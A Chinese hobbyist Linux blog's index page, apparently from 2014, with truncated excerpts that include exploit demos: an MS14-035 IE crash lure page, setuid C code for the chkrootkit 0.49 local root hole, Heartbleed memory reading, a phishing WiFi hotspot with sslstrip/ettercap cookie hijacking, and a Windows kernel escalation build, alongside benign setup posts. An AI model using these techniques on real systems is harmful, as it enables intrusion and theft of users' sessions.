显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 
 
 
 

[置顶] 博客说明

2014-1-15 20:40:37 阅读19702 评论23 152014/01 Jan15

简单说明下:

本人工作和电脑扯不着边,所以玩电脑属于业余爱好,当然技术也属于这个档次;开博客也不是正真为了开博客,只是为了记录一些平常玩电脑时有意思的方法,以前这些方法是写在纸质笔记上的,弄丢多次,所以最后决定使用网络日志。

非常欢迎有共同兴趣爱好的朋友转载日志;虽然我写的多数方法来自网络,但记录在这里并公开的全是自己实际操作;如果记录的某个方法完全是安照某一篇文章操作的,在末尾都会注明原文出处;有些方法实在是被转烂了,以至于无法得知原文出处时只能作罢;所以我希望如果有朋友要完全引用(直接Crtl + V)本博日志,请一定注明日志出处。

           如果喜欢寒博内容,为了更方便阅读,可以将 《所有日志》 添加到书签或者订阅本博,实时查看更新,点此订阅:RSS

           个人IRC频道,欢迎有相同兴趣爱好的朋友交流讨论:#xiao106347 @irc.freenode.net

作者  | 2014-1-15 20:40:37 | 阅读(19702) |评论(23) | 阅读全文>>

分享两个“跨栏”姿势

2014-7-19 17:30:39 阅读4569 评论5 192014/07 July19

关于 “跨栏”,本博已经介绍过3种免费姿势,虽然并不是全都主要说这方面:

在OpenShift上创建应用和使用ssh代理翻墙

I2P :Wellcome To The Darknet

Linux下使用 Goagent 翻墙

已经跨出去了,如何更灵活的使用代理,这里介绍两种小姿势:

1.在终端使用代理

前面有日志提到过设置浏览器使用代理和使用系统全局代理,想在终端使用代理可以使用终端全局代理;这里再介绍一种不使用系统全局代理却在终端使用代理。

以 i2p 为例,首先开启 i2p 服务:

/usr/local/i2p/i2prouter start && /etc/init.d/i2p start

打开编辑 ~/.bashrc :

nano ~/.bashrc

在末尾添加(不同的代理可以照情况修改):

http_proxy=127.0.0.1:4444

https_proxy=127.0.0.1:4445

export http_proxy

export https_proxy

让修改生效:

source ~/.bashrc

然后在这个终端查看效果:

while true;do clear && echo '我的外网ip是:' && wget -qo- ifocnfig.me/ip;sleep 120;done            #每2分钟刷新一次外网ip地址

作者  | 2014-7-19 17:30:39 | 阅读(4569) |评论(5) | 阅读全文>>

利用“MS14-035”,对IE浏览器进行恶意攻击

2014-7-8 20:53:28 阅读5063 评论0 82014/07 July8

这个漏洞可以导致IE浏览器崩溃,涉及的版本有 ie8,9,10,微软在14年6月10日发布了更新补丁,所以现在只能攻击没有更新至今年6月10号的IE浏览器了。详情看这里:

http://www.exploit-db.com/exploits/33860/

如上面介绍,利用这个漏洞,我们需要一段html代码。下面我在本机演示下局域网攻击吧,靶机是安装在虚拟机中的win7_sp1-ie9:

首先修改本机 /var/www 目录下的 index.html 为以下内容:

<html>

<head>

<meta http-equiv="refresh" content="5;url=http://192.168.1.29/poc.html">

<title>YOU HAVE BEEN HACKED</title>

</head>

<body>

you have been hacked,and you will shutdown!!

</body>

</html>

这个是攻击目标首先打开的页面,页面首先显示 “you have been hacked,and you will shutdown!!”,装个逼先;

然后设置 refresh 的时间为5秒("refresh"content=5):

作者  | 2014-7-8 20:53:28 | 阅读(5063) |评论(0) | 阅读全文>>

Chkrootkit 0.49 本地提权漏洞

2014-7-7 2:08:57 阅读2942 评论1 72014/07 July7

Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:

可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:

wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz

tar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz

cd chkrootkit-0.49/

./chkrootkit -V

普通用户在 /tmp 目录下新建 update.c(代码实示例如下):

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

然后编译好 update ,看下update的文件详情:

作者  | 2014-7-7 2:08:57 | 阅读(2942) |评论(1) | 阅读全文>>

Hearbleed Hacking In Kali-linux

2014-7-4 12:59:11 阅读8431 评论0 42014/07 July4

前段时间Heartbleed漏洞(CVE-2014-0160)造成的恐慌几乎席卷全球,各大网站的安全部门也是遇到了从未有过的危机,,,简单解释下就是 “用户通过TSL 加密链接向服务器发起 Client Hello询问,测服务器是否正常在线干活(形象的比喻就是心脏脉搏),服务器发回Server hello,表明正常建立SSL通信。每次询问都会附加一个询问的字符长度pad length,bug来了,如果这个pad length大于实际的长度,服务器还是会返回同样规模的字符信息,于是造成了内存里信息的越界访问...”

接下来这里就演示下分别用两个工具利用心脏出血漏洞读取服务器内存信息。因为内存里的信息不是一成不变的,所以不是每次都会出好东西的,所以大家多爆几次。

工具1:nmap+msfconsole

非常实用的hack工具组合,首先得升级msfconsole至最新版,然后给nmap添加一个针对heartbleed的扫描脚本,用来发现心脏出血漏洞:

cd /usr/share/nmap/scripts/

wget https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse

cd /usr/share/nmap/nselib/

wget https://svn.nmap.org/nmap/nselib/tls.lua

nmap --script-updatedb

添加成功之后扫描一个没有更新openssl的网站:

作者  | 2014-7-4 12:59:11 | 阅读(8431) |评论(0) | 阅读全文>>

Kali-Linux下创建一个钓鱼WiFi热点

2014-7-3 17:45:19 阅读46597 评论49 32014/07 July3

之前写过kali-linux下用 HostAPd+bridge-utils 搭建网桥的方式来创建wifi热点的日志,有兴趣可以在看下不同:

Kali-linux下使用HostAPd创建wifi热点(AP)

这里再介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!

所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:

Aircrack-ng 套件    #用来发送数据

isc-dhcp-server    #简单的dhcp服务器

sslstrip       #突破ssl加密

ettercap      #嗅探劫持

leaf /etc/dhcp/dhcpd.conf   编辑dhcp服务器配置文件,修改如下:

authoritative;

default-lease-time 700;

max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {

作者  | 2014-7-3 17:45:19 | 阅读(46597) |评论(49) | 阅读全文>>

Ettercap 使用进阶(1):详细参数

2014-7-3 1:46:17 阅读9382 评论6 32014/07 July3

Ettercap是一个非常强大的中间人攻击工具;本博客之前日志也有多次涉猎,这里详细了解下ettercap的参数,算是入门篇。

参考下:

Ettercap结合sslstrip对ssl/https进行攻击记录利用ettercap进行简单的arp欺骗和mitm攻击过程Kali下使用ettercap+msf渗透WindowsXP

关于界面:

ettercap提供 4 种运行界面:

Text            #文本模式,参数 -T ,一般配合 -q(安静模式)使用Curses/GTK         #图形模式,参数 -C/-GDaemonize          #守护模式(后台模式),参数 -D

运行模式:

两种模式(UNIFIED和BRIDGED)

Unified                   #中间人模式,即两台终端间进行欺骗,参数 -M

Bridged           

作者  | 2014-7-3 1:46:17 | 阅读(9382) |评论(6) | 阅读全文>>

HTTrack:克隆一个网站页面到本地

2014-7-1 18:30:00 阅读5589 评论1 12014/07 July1

HTTrack 是一个自由开源的网络爬虫软件,它可以将一个网站的页面下载(克隆,或者镜像)到本地,供本地离线浏览。

安装:

apt-get install httrack

使用起来也比较简单:

直接一条命令执行:

httrack "http://xiao106347.blog.163.com" -O /heome/backup/myweb/  "+*.xiao106347.blog.163.com/*" -v

# "+*.xiao106347.blog.163.com/*" 表示以 "*.xiao106347.blog.163.com/" 开头的所有页面,当然这里也可以直接是 "+http://xiao106347.blog.163.com/*",因为网易博客前面就只有 http!

或者先打开 httrack ,然后按照提示一步步设置:

看下效果图(我使用的窗口特效,下面的特效还没有来的急消失就被截下来了,所以看起来有点诡异,无视掉好了!):

作者  | 2014-7-1 18:30:00 | 阅读(5589) |评论(1) | 阅读全文>>

Kali_linux_x64安装Compiz

2014-7-1 6:08:38 阅读7120 评论6 12014/07 July1

64位Kali-linux安装 compiz ;逛 youtube 的时候看到有人写了kali-linux安装compiz的小脚本和一些必须组件,转了过来,分享如下:

文件名 :KaliCompizx64.tar.gz

下载地址:http://pan.baidu.com/s/1hqiQaTQ

安装方法:

tar vfxz KaliCompizx64.tar.gz

cd KaliCompizx64/

./KaliCompizx64.sh

完成后执行 compiz 开启效果,也可以在 ‘启动应用程序’ 里添加 compiz 的启动项,名字和命令都是 compiz,保证开机同时开启特效。

简单设置了几个效果(配合我的主题 muniux,效果比较不错):

高清视频地址:http://pan.baidu.com/s/1eQrHEHO

在线观看:

作者  | 2014-7-1 6:08:38 | 阅读(7120) |评论(6) | 阅读全文>>

提权神器:Windows NT EPATHOBJ Local Ring0 Exploit

2014-6-30 13:50:41 阅读6416 评论11 302014/06 June30

这个是2013年6月公布的windows nt内核本地提权0day漏洞(CVE-2013-3660),不过很快微软就在2013年7月更新补丁中修复了这个漏洞;这个漏洞涉及的windows版本有 XP, Vista, 7, 8, 2003, 2008 , 2012。

演示下利用过程:

首先在 Exploit-DB 下载 c 源码,下载地址:http://www.exploit-db.com/exploits/25912/

这里我们将源码保存为 CVE-2013-3660.c ,然后在windows下用 VS 10进行编译。

进入 C:\Program FIles <x86>\Microsoft Visual Studio 10.0\VC\bin 目录,

然后执行命令: vcvars32.bat x86

然后把我们下载的源码 CVE-2013-3660.c 复制到 C:\Program FIles <x86>\Microsoft Visual Studio 10.0\VC\bin 目录,然后进行编译:

cl CVE-2013-3660.c 

在当前目录下生成 CVE-2013-3360.exe 可执行文件

OK,这个

作者  | 2014-6-30 13:50:41 | 阅读(6416) |评论(11) | 阅读全文>>

LAMP+WordPress的搭建

2014-6-29 14:55:22 阅读6363 评论0 292014/06 June29

搭建LAMP(Linux+Apache+Mysql+Php)+WordPress;

我在自己本机上做个演示吧!

安装:

因为笔者使用的是kali-linux,LAMP(Linux+Apache+Mysql+Php)环境是默认安装好的,其实其他linux平台安装也很简单:

sudo apt-get install apache2

sudo apt-get install php5

sudo apt-get install mysql-server

sudo apt-get install mysql-client

sudo apt-get install php5-mysql

sudo apt-get install phpmyadmin

安装时会要求输入账户密码,kali用户的默认账户root密码是空的,回车即可,也可以选择此时修改密码:

phpmyadmin password

然后输入新密码即可。

安装之后启动服务:

sudo /etc/init.d/apache2 start

sudo /etc/init.d/mysql start

创建数据库:

mysql -u root -p             #输入密码进入数据库

作者  | 2014-6-29 14:55:22 | 阅读(6363) |评论(0) | 阅读全文>>

在GitHub上托管你的项目

2014-6-27 17:01:35 阅读9017 评论0 272014/06 June27

在GitHub托管自己的项目,老手们估计都能闭着眼睛玩了,这里写一个入门的教程吧,面向新手。

1.首先在GitHub创建一个帐号:

地址:https://github.com

2.生成密钥验证身份:

ssh-keygen -C 'your@email.address' -t rsa

选择保存位置和密码,在保存位置可以看到密钥文件

然后把密钥文件 ‘id_rsa.pub’ 的所有内容复制到下图的 ‘key' 框中,标题随便

验证:

ssh -T git@github.com

3.create a new repository:

4.选择并上传

将新建的 repository 克隆到本地,如:

git clone https://github.com/xiao106347/muniux.git

将要托管的项目放到 'muniux' 文件夹,如这里 muniux_v1.1.deb

在 'repository' 文件夹(如这里 'muniux' ):

重新初始化现存的 Git 版本库

git init

建立跟踪

git add 'muniux_v1.1.deb'

提交创建:

git commit -m 'muniux_v1.1.deb'

建立连接:

git remote add origin https://github.com/xiao106347/muniux.git

作者  | 2014-6-27 17:01:35 | 阅读(9017) |评论(0) | 阅读全文>>

Chat With 'IRC'

2014-6-25 21:35:07 阅读6237 评论4 252014/06 June25

估计已经有很多人在用 IRC 了,这里写个普及性质的日志吧,面向还没有在用而想用的。

IRC是Internet Relay Chat 的英文缩写,一般称为互联网中继聊天,由芬兰人Jarkko Oikarinen于1988年首创。工作原理很简单:IRC 服务器上有很多由用户创建的频道(Channel),用户用客户端软件使用 IRC协议连接到这些服务器,并进入频道即可与在同一频道的用户开始聊天或者与其中一位私密交谈。

首先要安装有客户端软件,这里推荐几个Linux下的:

Hexchat          #图形模式

irssi           #命令行模式

smuxi         #图形模式

安装之后打开客户端软件,图形界面直接输入服务器地址和给自己随机取一个Nickname 然后点连接,连接成功之后输入要进入的 频道,然后进去就可以开始聊天了;命令行模式则需要用以下命令:

/connect    #连接服务器,后跟服务器地址

/join

作者  | 2014-6-25 21:35:07 | 阅读(6237) |评论(4) | 阅读全文>>

Muniux_v1 Is Rsleased

2014-6-24 23:09:44 阅读8627 评论1 242014/06 June24

Metro-Style翩翩来袭。

本主题是基于'Flattice' Gtk主题和 'Flattr-icons' 图标主题,都是偏向metro方向的,这里做了一点点修改,并使用了一个metro感非常强烈的默认壁纸;GTK颜色依旧是灰色调;同本博之前的 win8.1-gtk主题一样,有多个metro窗口样式可供选择,不同的是将窗口左,右,下方的宽度从原来的 8 调为 3 ,看起来更加轻盈;鼠标也依旧是win8样式的;为配合主题达到更好的视觉效果,这里推荐使用 微软雅黑 字体。

依然是以 deb 安装包的方式发布,安装之后注销下,重新登录生效。其他类型的linux可以解压,自行设置。

顺便说下,其实这种 deb 安装包做起来很简单,之前也有日志涉及到了,虽然说的不是这方面,但是完全可以触类旁通,这次在日志后面我会贴出包里所有的执行代码,也不算是代码,就是几行命令,充其量是个小脚本。参考下

文件名:Muniux_v 1.0.deb

下载地址:http://pan.baidu.com/s/1jGvDcBc

文件名:Muniux_v 1.1.deb

下载地址:https://github.com/xiao106347/muniux

展示图:

附:

muniux/DEBIAN/postinst :

作者  | 2014-6-24 23:09:44 | 阅读(8627) |评论(1) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 

海外 南非 处女座

 发消息  写留言

 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016

注册 登录  
 加关注